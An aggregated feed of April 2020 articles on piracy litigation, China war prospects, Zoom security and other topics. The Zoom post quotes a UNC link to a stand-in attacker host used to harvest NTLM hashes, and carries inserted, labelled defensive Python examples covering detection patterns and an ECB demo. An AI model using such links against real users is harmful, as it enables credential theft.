RIAA Declares “Victory” in Megaupload Case Despite Not Having a Trial

Post Syndicated from Andy original https://torrentfreak.com/riaa-declares-victory-in-megaupload-case-despite-not-having-a-trial-200403/

Mention the word ‘Limewire’ to today’s file-sharers, downloaders, or streamers, and you’ll probably get a vacant stare in response. After being handed a massive defeat at the hands of the RIAA in 2010, it’s now viewed as old technology, a redundant cassette tape in a brand new hi-tech world.

But if a decade seems like a long time for a technology like Limewire, spare a thought for Megaupload. In a few months’ time, the shutdown of the site at the hands of US and New Zealand authorities (assisted by the MPAA and RIAA, of course) will be less than a year away from its own tenth anniversary.

Only a gambling man would dare to predict when or even if the multiple cases against Dotcom will ever be concluded, but for RIAA chairman and CEO Mitch Glazier, none of that seems to be as crucial as it once was.

In an interview just published by Rolling Stone, Glazier recalls his time at the RIAA, covering a wide range of topics affecting the industry. In respect of copyright and piracy issues, he effectively declares victory over the German-born entrepreneur.

“We have had some huge significant victories along the way,” he told Rolling Stone.

“Going to the Supreme Court to show that music is protected online; winning that case against Kim Dotcom and the cyberlocker world to deter future Kim Dotcoms from doing the same thing.”

The statement is interesting on a number of fronts. Firstly, it’s important to note that Kim Dotcom has yet to set foot in a US court to face not only a criminal action by the US Government but also civil suits filed by Hollywood and the music industry, headed by the RIAA.

That, of course, is entirely down to the Megaupload founder. He’s been fighting tooth and nail to avoid extradition to the United States and with decades in prison on the table, who wouldn’t?

Nevertheless, a court-stamped victory in any of these procedures remains on the distant horizon. As reported last week, the cases filed by the RIAA and MPAA have been on hold for years and have just been delayed for another six months.

So, from a technical perspective at least, the RIAA hasn’t had the pleasure of “winning the case against Kim Dotcom”. However, not all victories are achieved in court. In fact, ‘gone to trial and received a verdict’ affects a tiny minority.

If the aim of the action was to destroy Megaupload, that has been achieved in no uncertain terms. Within minutes of the launch of the operation, the file-hosting site was brought to its knees and, shortly after, there was little left but a mountain of servers gathering dust. This, of course, could be the significant victory Glazier was talking about.

And there are other matters too. The deterrent effect of the Megaupload raid was considerable and in the wake of its demise, other large file-sharing sites closed down. No one really knows how many other developers changed course as a result but it wouldn’t be a surprise if ‘many’ was the answer.

Nevertheless, just a year later Dotcom launched Mega, a massive file-sharing site that is still going strong today, albeit not under his control. Given the way Mega operates, it’s unlikely it could ever be tackled in the same way as Megaupload was. In many respects, its formation was guided by the case against Megaupload, which effectively handed the platform a guidebook on how not to fall foul of the law.

As the years have ticked by since the destruction of Megaupload, the acquisition of free music hasn’t sat still. In common with many types of piracy, it continues today and presents new challenges for those seeking to mitigate its effects. While file-hosting services still provide a threat, it’s more likely these days for the RIAA to be tackling sites that help users to obtain content for free from legitimate sources like YouTube.

“Now in the stream-ripping world, we are trying to figure out from an anti-circumvention point of view how to stop somebody hacking into YouTube’s system,” Glazier explains.

This is a clear reference to so-called YouTube-ripping sites, that allow music fans to download rather than stream content. The RIAA is in a battle with these platforms using a mix of direct legal action and the sending of large volumes of DMCA anti-circumvention notices. The latter might be proving an irritant to ripping platforms but they are not being put out of business.

Interestingly, Glazier hints that the anti-circumvention notice approach, which results in URLs of stream-ripping sites being permanently delisted from Google, may have in part been prompted by issues with the RIAA’s distribution platforms, the largest of which is YouTube.

“[T]he resources required to stop [stream-ripping] create tension between us and our licensing partners, so we have to see if we can address the issue through search or some other means. The brainstorm has been ever-changing,” he reveals.

But while there are always new challenges, some things never change. Pre-release leaks are a major source of distress to the record labels and Glazier says that these “emergencies” always keep him on his toes.

“If an artist has an album coming out and it goes up on a site before that, our job is to work with the other groups around the world — 24/7, 365 days a year — to get that down so the artist can receive the benefit of the release of their product,” he says.

Leaks apparently appear in Glazier’s email marked with a “little red flag” alongside what appears to be an action plan. Given the global reach of the labels, mitigation may start off in one time zone and then shift to another, to ensure that anti-piracy personnel are on the case around the clock. And that helps to blur the lines between Glazier’s working and social life too.

“[E]very 20 minutes there will be another ping from the label: ‘Is it down yet? Is it down yet? Is it down yet?’ Because the artist is saying to the label: ‘Is it down yet? Is it down yet? Is it down yet?’,” he explains.

“It’s always emergencies at the weekend. It’s just Murphy’s Law.”

From: TF, for the latest news on copyright battles, torrent sites and more. We also have an annual VPN review.

The implausibility of a war with China

Post Syndicated from esr original http://esr.ibiblio.org/?p=8643

In the wake of the PRC’s actions around the COVID-19 pandemic, there has been increasing speculation in some circles that the PRC might be preparing to wage war against the United States, or at least some sort of regional war (such as an invasion of Taiwan) in which treaty obligations would involve the U.S.

I’ve actually been considering this possibility, from my perspective as a wargamer and military-history buff, for over a decade – ever since China began seriously flexing its muscles in the South China Sea. And the risk of war has undoubtedly been rising recently.

The PRC has given U.S. and other trade partners ample reason to conclude that they need to decouple their economies from Chinese supply chains. Threats by China to use its control of most of rare-earth production for economic blackmail have been followed by much more serious threats to use its dominance of the manufacturing of basic pharmaceuticals as a weapon.

Post-COVID-19, it’s now strategically vital for other nations to develop supply chains for critical goods that are domestic, or at least better guarded against the political and epidemiological risk of relying on Chinese manufacturing. While necessary, this shift does mean the PRC has less to lose in the event of going to war.

Nevertheless, I continue to judge that the odds of China launching a war are very low. Nobody can entirely rule out enraged, irrational behavior by the PRC, but in the remainder of this post I will attempt to demonstrate why the war options available to the PRC hold out little or no prospect of a satisfying victory and entail severe terminal risks.

To wage a winning war, you need to formulate a set of war aims that are achievable with the tools and resources you have. Your strategy derives from your war aims, which have to be grounded in some notion of how you will manage the peace following a military victory to your advantage.

Historically, the overwhelmingly most common sort of aggressive war is a war of conquest. In these the war aim is simple – to conquer and annex some territory, and then integrate it into your state structure following victory.

In more sophisticated versions of this game you may be satisfied with the creation of a compliant client state from your conquest.

A step further away from raw conquest is war to maintain position as the dominant power (the hegemon) of a trade network that gathers wealth for your nation even without exerting formal control of the other polities in the network. Many wars that at first sight appear to be ideologically motivated can be understood this way, with political or religious ideology providing a rationale for hegemony that the entire trade network accepts – or can at least be made to echo.

Broadly speaking, land powers tend to wage wars of conquest, while maritime powers wage wars of hegemony. There have been exceptions in both directions.

In all these cases, a set of war aims needs to hold out a better than even chance that the gains of war will outweigh the costs.

To understand how limited the PRC’s war options are, we can start with a grasp on how difficult and unsatisfying any war of conquest would be due to the geographic box China is in. The obstacles around it are formidable.

To the south, the Himalayan massif makes all of South Asia other than a narrow coastal plain on the Southeast Asian peninsula inaccessible to serious troop movements. There are no roads or rail links. The last time the Chinese tried pushing in that direction, in 1979, they were unable to sustain an offensive at any distance from their railheads and withdrew after less than a month. Their war aim – forcing the North Vietnamese to withdraw their troops from Cambodia – failed.

To the west, the vastness and comparatively undeveloped state of China’s western hinterland is a serious logistical problem before one even gets to the border. At the borders, the Tien Shan and Pamir ranges present a barrier almost as formidable as the Himalayas. External road and rail links are poor and would be easily interdicted.

To the north, movement would be easier. It might be just within logistical possibility for the PLA to march into Siberia. The problem with this idea is that once you’ve conquered Siberia, what you have is…Siberia. Most of it, except for a small area in the south coastal region of Primorsky Krai, is so cold that cities aren’t viable without food imports from outside the region. Set this against the risks of invading a nuclear-armed Russia and you don’t have a winning proposition.

To the east is the South China Sea. The brute fact constraining the PRC’s ambitions in that direction is that mass movement of troops by sea is risky and difficult. I recently did the math on Chinese sealift craft and despite an expensive buildup since the 1980s they don’t have the capacity to move even a single division-sized formation over ocean. Ain’t nobody going to take Taiwan with one division; they’ve had too much time to prepare and fortify over the last 60 years.

The PRC leadership is evil and ruthless, but it’s also cautious and historically literate and can read maps. Accordingly, the People’s Liberation Army is designed not to take territory but to hold the territory the PRC already has. Its mission is not conquest but the suppression of regional warlordism inside China itself. The capability for it to wage serious expeditionary warfare doesn’t exist, and can’t be built in the near-term future.

It’s often said that the danger of aggressive war by China is a function of the huge excess of young men produced by covert sexual selection and the one-child policy. But to expend those young men usefully you need to get them to where they can fight and are motivated by some prospect of seizing the wives unavailable for them at home. The PRC can’t do that.

The military threat from China is, therefore, a function of what it can do with its navy, its airpower, and its missiles. And what it can do with those against the U.S. is upper-bounded by the fact that the U.S. has nuclear weapons and would be certain to respond to a PRC nuclear or EMP attack on the U.S. mainland by smashing Chinese cities into radioactive rubble.

Within the constraints of conventional warfare waged by navy and air force it is difficult to imagine an achievable set of PRC war aims that gains more than it costs.

This isn’t to say the PRC couldn’t do a lot of damage if it wants to. Anybody with a brain has to worry about U.S. carriers looking like big, fat, slow targets in the modern naval battlespace. There’s intelligence that the PRC is working hard on hypersonic ship-killer missiles, and I certainly would be in their shoes. It may already be unsafe for hostile carriers to operate inside the first island chain.

The problem is this: after you’ve surprised and sunk a couple of U.S. fleet carriers, what do you do for an encore? How do you convert that tactical victory into strategic gains? You’re not going to do it with your army, which can’t get anywhere more interesting after the sinkings than it could before.

Your problems are compounded by China’s extreme import dependence. You need a constant high volume of imports of coal, oil, and steel to keep your economy running. These have to be imported through sealanes that are extremely vulnerable to interdiction, notably at the Malacca Straits and in the Persian Gulf.

In a lot of ways your strategic situation is like a scaled-up version of Japan’s in 1941 – you could seize the initiative with a Pearl-Harbor-like initial shock, but you can’t wage a long war because without sealane control you’ll run out of key feedstocks and even food rather rapidly. And unlike the Japanese in 1941, you don’t have the kind of serious blue-water navy that you’d need for sealane control outside the First Island Chain – not with just two carriers you don’t.

There is one way an aggressive naval war could work out in your favor anyway. You can count on the U.S.’s media establishment to be pulling for the U.S. to lose any war it’s in, especially against a Communist or Socialist country. If your war goals are limited to ending U.S. naval power projection in the Western Pacific, playing for a rapid morale collapse orchestrated by agents of influence in the U.S. is not completely unrealistic.

It’s playing with fire, though. One problem is that before you launch your attack you don’t know that your sucker punch will actually work. Another is that, as the Japanese found out after Pearl Harbor, the American public may react to tragic losses with Jacksonian fury. If that happens, you’re seriously screwed. The war will end with your unconditional surrender, and not sooner.

You’re probably screwed anyway. Given even minimal spine in the U.S.’s civilian leadership, the U.S. Navy can strangle your economy in a matter of months by interdicting a handful of chokepoints well outside of the area where you can sustain naval operations at a wartime tempo. Those hypersonic missiles are all very well if you actually have them, but even if you could reach out and touch the Malacca Straits with them they’re not going to do much against attack submarines.

Again I note that the PRC leadership can read maps. It is probably more aware and less self-deluding about the economic precariousness of its situation than American politicians would be if the positions were reversed, because Marxist doctrine insists that politics is an epiphenomenon of economics.

The PRC can start a war, but they don’t have the capability to win one. That’s why, barring a Hitler-scale episode of insanity in the PRC leadership, it’s not going to happen.

OCCRP Receives the Skoll Award as a Serious Investment in Scaling the Organization’s Impact

Post Syndicated from Bivol Team original https://bivol.bg/occrp-skoll-2020.html

Friday 3 April 2020

From the Organized Crime and Corruption Reporting Project (OCCRP)

The Organized Crime and Corruption Reporting Project (OCCRP) has received the 2020 Skoll Award for Social Entrepreneurship. The award is given to a select group of social entrepreneurs whose innovations have already had a significant, proven impact on some of the world’s most pressing problems and who are positioned to scale that impact substantially. It provides 1.5 million dollars in grant funding over the next three years.

The Skoll Award

“At a time when the world is fighting a brutal global pandemic, it is more important than ever for its citizens to be able to recognize the corrupt leaders and criminal networks that profit from the looming danger. We must also get ahead of the post-pandemic recovery efforts, which will be rife with opportunities for abuse,” said Paul Radu, co-founder and director of innovation at OCCRP. “The OCCRP network plays a unique role in demanding accountability from the powerful, and we are extremely grateful to the Skoll Foundation for recognizing the power of investigative journalism at such a critical moment.”

The Skoll Award represents a significant investment in OCCRP’s efforts to develop and equip a global network of investigative journalists and to expose the crime and corruption that continue to destroy lives, livelihoods and democracy. OCCRP, which works on five continents and publishes more than 100 cross-border investigations a year, is the first media organization in the 21-year history of the Skoll Award to receive this recognition.

“As independent media continue to be targeted by threats around the world, the partnership with the Skoll Foundation will help us provide new opportunities for the small nonprofit outlets in our member network, which in some cases are the only independent voices in their countries,” said Drew Sullivan, co-founder and publisher of OCCRP.

With this year’s award, OCCRP joins the global Skoll community, led by mission-driven civil society leaders, political leaders, donors and storytellers. “For OCCRP, the ability to change the world depends on how many people we reach with our investigations. This investment comes at a decisive moment for the organization, but it is the partnership with Skoll and with the wider community that makes it an invaluable opportunity to maximize our reach and impact,” said Camille Eiss, OCCRP’s director of global partnerships and policy.

Paul Radu and Drew Sullivan were to receive the Skoll Award at the Skoll World Forum in Oxford, United Kingdom, but because of the coronavirus pandemic the event was moved to a virtual forum.

Translation: Bivol

How Do Coronavirus Tests Work?

Post Syndicated from Emily Waltz original https://spectrum.ieee.org/the-human-os/biomedical/diagnostics/how-do-coronavirus-tests-work

Months into the COVID-19 pandemic, the United States has finally moved from relying entirely on a single, flawed diagnostic test to having what may soon be an onslaught of testing options available from private entities. The U.S. Food and Drug Administration over the last three weeks has authorized the emergency use of more than 20 diagnostic tests for the novel coronavirus known as SARS-CoV-2.

Those add to the hundreds of tests that researchers are developing globally. The Foundation for Innovative New Diagnostics (FIND) in Geneva, Switzerland keeps a running global list of COVID-19 tests that, as of 3 April, neared 400. 

To help our readers sort through the deluge of diagnostics, here, we provide a simple explainer on coronavirus testing.

Coronavirus Pandemic Prompts Privacy-Conscious Europe to Collect Phone Data

Post Syndicated from Jeremy Hsu original https://spectrum.ieee.org/tech-talk/telecom/security/how-coronavirus-pandemic-europe-collecting-phone-data

Amid the coronavirus pandemic, even privacy-conscious European governments have asked telecom companies for residents’ phone location data in hopes of understanding whether national social distancing measures such as stay-at-home orders and business closures are having any effect on the spread of COVID-19.

Some of the hardest-hit countries, including Italy and Spain, are now open to proposals for mobile apps that can make contact tracing more efficient and alert people who have come into contact with someone infected by the novel coronavirus.

Security and Privacy Implications of Zoom

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace). So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.’” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Windows credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.
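The defect in the quoted passage is the linkifier, not the UNC string itself: a chat client that turns `\\host\share` into a clickable link hands the user a one-click NTLM handshake with whatever host is named. As an added example (not code from the original post or from Zoom), here is a small Python chat-text linkifier in both forms: a naive one that links anything URL- or UNC-shaped, and a hardened one that links only http and https and leaves UNC paths and `file:` URLs as escaped plain text, plus an audit helper for spotting UNC strings in stored chat logs. The message lines and host names are constructed for the demo.

```python
import html
import re

# Constructed chat lines for the demo (hosts and paths are assumptions, not real systems).
SAMPLE_MESSAGES = [
    "Slides are at https://docs.example.com/deck.pdf",
    r"Notes are in \\fileserver.example.com\C$\share\notes.txt",
    "Or open file://fileserver.example.com/share",
    "No links here",
]

# \\host\share\... or \\host/share: the shapes Windows treats as a UNC path.
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._\-]+(?:[\\/][^\s\\/]+)*")
# Anything with a URL scheme; the scheme is captured so it can be allow-listed.
URL_RE = re.compile(r"""\b(?P<scheme>[a-z][a-z0-9+.\-]*)://[^\s<>"']+""", re.IGNORECASE)
SAFE_SCHEMES = {"http", "https"}


def find_unc_paths(text):
    """Audit helper: every UNC-shaped string in one message."""
    return UNC_RE.findall(text)


def audit_messages(messages):
    """(index, unc_path) for each UNC path found in a batch of stored chat lines."""
    return [(i, p) for i, msg in enumerate(messages) for p in find_unc_paths(msg)]


def _anchor(target):
    safe = html.escape(target, quote=True)
    return f'<a href="{safe}">{safe}</a>'


def linkify_naive(text):
    """The risky behaviour: anything URL- or UNC-shaped becomes a clickable link."""
    out = URL_RE.sub(lambda m: _anchor(m.group(0)), text)
    return UNC_RE.sub(lambda m: _anchor(m.group(0)), out)


def linkify_safe(text):
    """Hardened: only http(s) URLs become links; everything else is escaped text."""
    parts, pos = [], 0
    for m in URL_RE.finditer(text):
        parts.append(html.escape(text[pos:m.start()]))
        url = m.group(0)
        if m.group("scheme").lower() in SAFE_SCHEMES:
            parts.append(_anchor(url))
        else:
            parts.append(html.escape(url))   # file:, smb:, etc. stay plain text
        pos = m.end()
    parts.append(html.escape(text[pos:]))    # UNC paths land here, never linked
    return "".join(parts)


if __name__ == "__main__":
    for i, path in audit_messages(SAMPLE_MESSAGES):
        print(f"message {i}: UNC path {path}")
    for msg in SAMPLE_MESSAGES:
        print(linkify_safe(msg))
```

The scheme allow-list is the important design choice: a deny-list of `\\` would miss the `file:` form and any other local-resource scheme the client might resolve, whereas allowing only http and https fails closed.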

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.
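Why ECB leaks patterns, as an added example that is not code from the original post or from Citizen Lab. The block cipher below is a small keyed Feistel network built from HMAC-SHA256; it stands in for AES so the example runs on the standard library alone, and it is an assumption of the example, not Zoom's cipher. The point is the mode, not the cipher: under ECB the same plaintext block always produces the same ciphertext block, so repeated audio or video frames remain visible as repeated ciphertext blocks, while CBC with a fresh IV chains each block to the previous one and masks the repeats. The constructed plaintext is one 16-byte frame repeated four times, and the repeated-block ratio is the classic check used to tell ECB ciphertext apart from other modes.

```python
import hmac
import hashlib

BLOCK = 16      # 128-bit blocks, like AES
ROUNDS = 4

# Constructed key and IV for the demo (assumption: not real key material).
DEMO_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
DEMO_IV = bytes.fromhex("a1b2c3d4e5f60718293a4b5c6d7e8f90")
FRAME = b"SAME-AUDIO-FRAME"      # one 16-byte "frame", repeated below
PLAINTEXT = FRAME * 4


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key, rnd, half):
    # Keyed round function: HMAC-SHA256 truncated to the 8-byte half width.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    """Stand-in 128-bit block cipher (4-round Feistel), used in place of AES."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right


def _blocks(data):
    assert len(data) % BLOCK == 0, "demo uses unpadded, block-aligned input"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, data):
    # ECB: each block is encrypted independently, so equal plaintext blocks
    # give equal ciphertext blocks.
    return b"".join(block_encrypt(key, b) for b in _blocks(data))


def cbc_encrypt(key, iv, data):
    # CBC: each block is XORed with the previous ciphertext block (or the IV)
    # before encryption, so repeats in the plaintext are masked.
    out, prev = [], iv
    for b in _blocks(data):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def unique_block_ratio(ciphertext):
    """Fraction of distinct 16-byte blocks; 1.0 means no block repeats."""
    blocks = _blocks(ciphertext)
    return len(set(blocks)) / len(blocks)


def looks_like_ecb(ciphertext):
    """Classic detector: any repeated block in a short message is a strong ECB signal."""
    return unique_block_ratio(ciphertext) < 1.0


def demo():
    ecb = ecb_encrypt(DEMO_KEY, PLAINTEXT)
    cbc = cbc_encrypt(DEMO_KEY, DEMO_IV, PLAINTEXT)
    return {
        "ecb_unique_ratio": unique_block_ratio(ecb),
        "cbc_unique_ratio": unique_block_ratio(cbc),
        "ecb_flagged": looks_like_ecb(ecb),
        "cbc_flagged": looks_like_ecb(cbc),
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the ECB ciphertext collapsing to a single distinct block (ratio 0.25) while the CBC ciphertext has four distinct blocks; the same check applied to real AES output behaves identically, because the leak comes from the mode. Note that CBC here only fixes confidentiality of patterns; an authenticated mode such as GCM is what a production design should use.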

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

“Zoombombing” is the most visible problem. People are finding open Zoom meetings and events, joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.
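One defender-side consequence of short, guessable meeting IDs is that enumeration is visible in the service's own join logs as a single source trying many distinct IDs in quick succession. As an added example, not code from the original post or from Zoom, here is a Python detector run over a few constructed join-log lines (the log format, IP addresses and meeting IDs are all assumptions): it flags any source that, within a 60-second window, probed at least five distinct meeting IDs without joining. A `password_required` response still counts as a probe, because it confirms to the caller that the ID exists.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Assumed log format: "<iso-timestamp> src=<ip> meeting=<id> result=<outcome>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) meeting=(?P<meeting>\d+) result=(?P<result>\w+)$"
)

# Constructed sample log: one legitimate user and one source walking through IDs.
SAMPLE_LOG = """\
2020-04-03T10:00:00Z src=198.51.100.7 meeting=913042118 result=joined
2020-04-03T10:00:01Z src=203.0.113.5 meeting=100000001 result=not_found
2020-04-03T10:00:02Z src=203.0.113.5 meeting=100000002 result=not_found
2020-04-03T10:00:03Z src=203.0.113.5 meeting=100000003 result=not_found
2020-04-03T10:00:04Z src=203.0.113.5 meeting=100000004 result=not_found
2020-04-03T10:00:05Z src=203.0.113.5 meeting=100000005 result=password_required
this line is malformed and should be skipped
2020-04-03T10:02:00Z src=198.51.100.7 meeting=913042118 result=not_found
""".splitlines()


def parse_line(line):
    """Return (timestamp, src, meeting_id, result) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["meeting"], m["result"]


def detect_enumeration(lines, window_s=60, threshold=5):
    """Sources that probed >= threshold distinct meeting IDs (any non-join
    result) inside a sliding window of window_s seconds."""
    recent = defaultdict(deque)   # src -> deque of (timestamp, meeting_id)
    flagged = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, meeting, result = parsed
        if result == "joined":
            continue              # a real join is not a probe
        q = recent[src]
        q.append((ts, meeting))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()           # drop events that fell out of the window
        if len({m for _, m in q}) >= threshold:
            flagged.add(src)
    return sorted(flagged)


if __name__ == "__main__":
    print("enumeration suspected from:", detect_enumeration(SAMPLE_LOG))
```

The legitimate user who mistypes an ID once is never flagged, because the count is of distinct IDs per source per window rather than of failures overall; tune `threshold` and `window_s` to the normal error rate of the service before acting on the output.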

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

How to Practice Activist Engineering

Post Syndicated from Darshan M.A. Karwat original https://spectrum.ieee.org/tech-talk/at-work/tech-careers/how-to-practice-activist-engineering

This is a guest post. The views expressed here are solely those of the author and do not represent positions of IEEE Spectrum or the IEEE.

Engineering work has far-reaching implications, both designed and unintended. For example, continued engineering investments in weapons of mass destruction may not be creating a more peaceful world, and deepfake technology is changing our perceptions of truth itself.

It’s crucial for engineers to have the ability to understand and act on the implications of their work. Some reflective engineers, inspiringly, are speaking up, like those who started the Engineer’s Declare movement in response to the climate and biodiversity crises, or those at Google who successfully fought to end their company’s involvement in building artificial intelligence technology to be used in warfare. 

While certainly provocative—and for some engineers, inspiring—these stories are not the norm. The norm is probably more like the case of my friend who works for a large defense contractor. He got his PhD in aerospace engineering—just like I did—having studied computational fluid dynamics. He wanted to do engineering work that he thought was meaningful to the world. But he couldn’t find any other good job close to his partner, so he wound up in defense.  

[$] 5.7 Merge window part 1

Post Syndicated from corbet original https://lwn.net/Articles/816313/rss

As of this writing, 7,233 non-merge changesets have been pulled into the
mainline repository for the 5.7 kernel development cycle — over the course
of about three days. If current world conditions are slowing down kernel
development, it would seem that the results are not yet apparent at this
level. As usual, these changesets bring no end of fixes, improvements, and
new features; read on for a summary of what the first part of the 5.7 merge
window has brought in.

Q&A: Sourcegraph’s Universal Code Search Tool

Post Syndicated from Rina Diane Caballar original https://spectrum.ieee.org/tech-talk/computing/software/sourcegraph-universal-code-search-tool

In software development, code search is a way to better navigate and understand code. But it’s an often overlooked technique, with development tools and coding environments offering clunky and limited search functionalities.

Tech startup Sourcegraph aims to change that with its universal code search tool by the same name that makes searching code as seamless as doing a Google search on the web. To achieve that efficiency, Sourcegraph models code and its dependencies as a graph, and performs queries on the graph in real time.

Privacy in the Time of COVID-19

Post Syndicated from Mark Pesce original https://spectrum.ieee.org/telecom/security/privacy-in-the-time-of-covid19

